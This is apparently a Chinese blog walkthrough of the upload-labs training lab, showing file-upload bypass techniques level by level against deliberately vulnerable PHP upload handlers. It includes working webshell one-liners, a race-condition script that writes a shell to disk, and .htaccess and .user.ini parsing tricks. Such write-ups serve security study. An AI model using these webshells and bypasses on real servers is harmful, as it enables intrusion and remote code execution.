web漏洞-文件上传

已于 2024-01-29 17:30:49 修改
阅读量1.2k 收藏 30
点赞数 37
文章标签: 前端 android
于 2024-01-16 17:42:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yyyadef/article/details/135617014
版权

一、前端绕过

方法1:bp抓包改后缀

蚁剑测试连接

方法2:浏览器禁用JS代码

直接上传shell.php,上传成功

方法3:bp剔除响应JS

选中后刷新,然后上传shell.php,上传成功

方法4:浏览器找到源代码删除js(火狐)

删除return checkFile()

上传shell.php

方法5,替换js文件(chrome)

找到localhost/upload/Pass-01/index.php文件,复制保存到本地,删除return checkFile()

右击替换内容

上传shell.php,上传成功

二、MIME绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

绕过

三、黑名单绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

不允许上传.asp,.aspx,.php,.jsp后缀文件!

.php3  绕过

前提条件

1.phpstudy 2018

2.更改Apache配置文件httpd.conf

        AddType application/x-httpd-php .php .phtml .php3 .php4 .html

上传shell.php3 文件,并复制图片地址

四、黑名单绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

 黑名单没有.htaccess

上传文件没有重命名

.htaccess绕过:

前提条件

1.phpstudy 2018

2.使用.htaccess上传配置文件进行解析

        <FilesMatch "shell.png">  # shell.png使用php解析
            SetHandler application/x-httpd-php
        </FilesMatch>

或者

        SetHandler application/x-httpd-php  当前目录所有文件使用php解析

先上传.htaccess文件,再上传shell.png

其他方式: .空.

五、黑名单绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

没有禁用.ini、

使用.空.绕过  后端会先删除末尾点 (.空),再从最后一个点开始截取 

方法1:.空.

方法2:.ini绕过

在访问php文件时,自动包含这个文件

新版老版小皮都行   php版本5.3.29 nts 7.3.4nts都行,其余版本未测试

1.先上传 .user.ini 文件

        内容为auto_prepend_file=shell.png

        意思是:所有的php文件都自动包含shell.png文件,.user.ini相当于一个用户自定义的php.ini。访问目录下的readme.php会自动包含shell.png

2.上传 shell.png

3.连接  readme.php

注意

        windows中保存默认没点
        linux下保存文件不会删除末尾的点

六、黑名单绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

 未做大小写过滤

大小写绕过

上传shell.pHP

注意:windows不区分大小写

七、黑名单绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

未去掉末尾空格

末尾空格绕过

 八、黑名单绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

 截取前为删除末尾的点

. 绕过

九、黑名单绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

 未删除末尾的 ::$DATA

::$DATA 绕过 

十、黑名单

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

 使用.空.绕过  后端会先删除末尾点 (.空),再从最后一个点开始截取 

.空.绕过

十一、黑名单绕过

源码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

黑名单中的替换成空 ,构造 .pphphp  替换掉php 还剩.php

拼接绕过

十二、白名单绕过-GET型

源码

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

 $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);

获取到后缀不要点 

特点

正常抓包

改save_path = ../

00截断绕过

注意事项

1.PHP5.3之后的版本中完全修复了00截断,5.2.17能实现

2.00截断受限与GPC ,addslashes函数,GET型提交的内容会被自动进行URL解码。  一定要关闭GPC,否则无法成功。若关闭无法成功,则去.ini配置文件修改

十三、白名单绕过-POST型

源码

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

 绕过

 在POST请求中,  %00不会被自动解码,需要在16进制中进行修改00

删除shell.php后面,连接成功

十四、图片码

制作图片码

准备图片文件1.jpg 和2.php文件

2.php文件

GIF

<?php @eval($_POST["cmd"]);?>

copy 1.jpg/a + 2.php/b 3.jpg

绕过

1.上传普通1.png文件探测环境图片地址,无前端过滤,文件被重命名且后缀名被修改为jpg。

 2.上传图片码 3.jpg

3.文件包含http://localhost/upload/include.php?file=upload/2620240116172053.jpg

十五、图片码

同14

十六、图片码,不能上传

十七、图片码,二次渲染

emeditor 比较上传前后的文件,把为改变位置的值改为php代码

十八、竞争上传

代码

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            #sleep(10);  #休眠10秒,便于复现
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

复现

1.createShell.php

<?php
fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');
echo 111;
?>

 2.请求上传的createshell.php文件,生成 shell.php

3.连接shell.php

不设置

十九、

yyyadef
关注
  • 37
    点赞
  • 30
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件漏洞webshell简介
Marsper的博客
11-03 1364
文件漏洞 漏洞概述 文件web应用的必备功能之一,比如上头像显示个性化、上附件共享文件、上脚本更新网站等。如果服务器配置不当或者没有进行足够的过滤,web用户就可以上任意文件,包括恶意脚本文件、exe程序等,这就造成了文件漏洞漏洞成因 文件漏洞的成因,一方面服务器配置不当会导致任意文件;另一方面,web应用开放了文件功能,并且对上文件没有进行足够的限制;再者就是,程序开发部署时候,没有考虑到系统特性和验证和过滤不严格而导致限制被绕过,上任意文件漏洞危害 上
文件(包括编辑器上漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件漏洞可做参考)
wangluoanquan111的博客
04-02 851
由于服务器认为上的是JPEG图片,所以文件将被放行,即使上的实际是一个可执行的PHP脚本,也将被视为正常的图片文件。type,即便上一个“avatar.jpg”文件,实际上这是一个php脚本文件,攻击者成功绕过了文件类型检测机制,该文件会被服务器识别为php文件并执行其中的恶意代码。注意,以上是常用的一些示例,但黑客可能会使用其他扩展名和方法来绕过黑名单。如果限制文件大小的方法不充分,攻击者可以通过在上之前将大文件拆分成多个小文件并分别上来绕过限制,在上时,攻击者可能会将文件重新组合起来。
文件绕过方法总结(入门必看)
最新发布
qq_65165505的博客
05-13 1667
常见文件绕过方法的总结
文件漏洞webshell)和文件包含漏洞
weixin_49390750的博客
08-08 819
文件漏洞webshell)
关于文件漏洞靶场upload-labs的入门练习及思路
xiaobai的博客
04-22 1017
本次实验用到的环境:Phpstudy,burpsuite(以下简称bp),和文件靶场upload-labs,渗透版火狐浏览器,中国菜刀/蚁剑。 步入正题 先将靶场环境放于phpstudy的网站根目录www,打开bp代理,浏览器设置本地代理: 将bp和浏览器代理都设置为127.0.0.1,在写一个一句话木马,这里我们采用php一句话木马,然后就可以开始了。 正式开始:第一关 我们先初步进行一...
文件常用绕过方式
weixin_43077878的博客
04-02 2000
1.前端。
第24天:WEB漏洞-文件之WAF绕过及安全修复1
08-03
Content-Disposition:一般可更改name:表单参数值,不能更改filename:文件名,可以更改Content-Type:文件 MIME,视情
web-渗透-文件漏洞专题靶场.rar
03-14
本靶场为二十一个关于文件漏洞的环境,从前端绕过、服务器绕过、木马图上绕过、截断绕过、竞争条件等等几乎包含目前所有的文件漏洞类型,刷完即掌握文件漏洞的所有要点。 文件中打包了所需的所有环境...
Web安全渗透学习-文件漏洞-附件资源
03-02
Web安全渗透学习-文件漏洞-附件资源
第3章 3.WEB安全性测试--文件漏洞.mp4
05-08
第3章 3.WEB安全性测试--文件漏洞.mp4
文件漏洞
G208_522的博客
11-15 972
第一关 1.看到文件框,先上一张正常图片进行测试。查看网页源代码,获得图片上的路径,可知在www目录下的upload目录下,冰蝎连接时直接url为http:192.168.139.131:8888/upload/shell.php 2.上shell.php 一句话木马,出现报错,可使用burpsuit拦截包查看,发现无法拦截包就已经弹框,可确认这是前端验证 3.绕过前端验证,更改shell.php为shell.jpg,然后利用bp拦截包,将后缀更改回来,绕过前端验证 4.上成功 5.使
文件的各种绕过方式
qq_59357741的博客
08-11 7858
常见的文件的各种漏洞
文件漏洞及绕过检测的方式
seek_2022的博客
05-07 1万+
文章目录一、什么是文件漏洞?二、目标会对文件做哪些防护?(一)客户端检测(二)服务端检测(三)白名单和黑名单的区别三、绕过后端黑名单检测(一)换一个后缀名绕过黑名单检测(二)用.htaccess文件巧妙绕过黑名单(三)用大小写绕过后缀名检测(四)文件后缀加空格或点绕过后缀名检测(五)构造文件后缀绕过后缀名检测(六)双写绕过后缀名检测(七)Windows文件流绕过后缀名检测四、绕过白名单检测(一)%00截断和00截断(二)绕过Content-Type检测(三)用图片木马绕过白名单检测(四)用gif文件
文件漏洞常用绕过方式
热门推荐
qq_62078839的博客
04-07 1万+
目录 文件漏洞原理 常用防御方式和常用防御方式的绕过 一、前端JS检测 二、MIME检测 三、白名单检测 %00截断 0x00截断 四、黑名单绕过 文件拓展名绕过 .htaccess文件绕过 .user.ini.绕过 apache解析漏洞 IIS解析漏洞 Nginx解析漏洞 widows系统文件命名规则的特殊利用 五、文件内容检测 ①文件头检测 ②shell检测 六、条件竞争 靶场实战 文件漏洞原理 由于网站在对文件的上功能中没...
如何在客户端上shell脚本文件,并利用PHP调用执行脚本
DAYDAYUP
05-07 3401
题目中的上包含两部分,一部分是上文件,一部分是利用PHP执行脚本 上文件到指定文件夹 所谓文件是指将本地文本文件,图片视频或者音频等文件到服务器上,以供后续操作的过程。 上文件有几种方式,包括: - 单纯的form表单上提交 使用form表单的input[type=”file”]控件,打开系统的文件对话选择框,选择文件然后利用submit和form中跳转的actio...
php前端后缀名绕过,有关上webshell文件绕过的总结
weixin_39911916的博客
03-28 1159
2017-08-15下午碰到一个站,有两处上漏洞,通过一个点获取了webshell,尝试另一个点获取shell,还使用了白盒测试,然而并没有绕过。总结一下,碰到文件的好事,应该如何绕过后缀名1. 前台脚本检测扩展名由于是客户端脚本的检测,任何的逻辑都可以通过burpsuit抓包,直接更改报文内容,替换文件扩展名2. Content-Type检测文件类型-绕过Content-Type检测是对h...
php上+shell,python/php/shell实现ftp上文件
weixin_35214794的博客
03-25 123
今天同事问我用python来实现ftp上文件是否熟悉,因为之前没接触过,所以现在研究下,通过参考了一些文档,简单编写了code,已测试通过!Ftp服务端相关的配置我这里就不啰嗦了!希望对大家有所帮助!python代码如下:#!/usr/bin/env python#-*- coding:utf-8 -*-#author:icyboyfrom ftplib import FTPimport os,...
MIME类型绕过漏洞
whatiwhere的博客
11-15 7817
实验环境 操作机: Windows XP 目标机:Windows 2003 目标网址:www.test.com 实验目的 掌握上绕过服务端MIME的原理 掌握上绕过服务端MIME的方法 实验工具 Burp Suite: 是用于攻击web 应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP ...
[基本实验] 利用Burp和FireBug绕过上漏洞的前端防护
07-23 5194
前端代码一共分为两部分,upload.html负责表单,upload.php负责上处理 upload.html 图片上 function checkFile(){ var flag = false;//是否可以上的标志位 var str = document.getElementById("file").value;//获取文件名 str = str.substring(st
web网站文件漏洞和攻击-运维安全详细笔记
06-30
在"web网站文件漏洞和攻击-运维安全详细笔记"中,本文详细探讨了Web应用中的文件漏洞及其潜在威胁。文件漏洞是指网站设计时未能正确验证用户上文件类型或内容,这可能导致恶意用户上恶意脚本或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值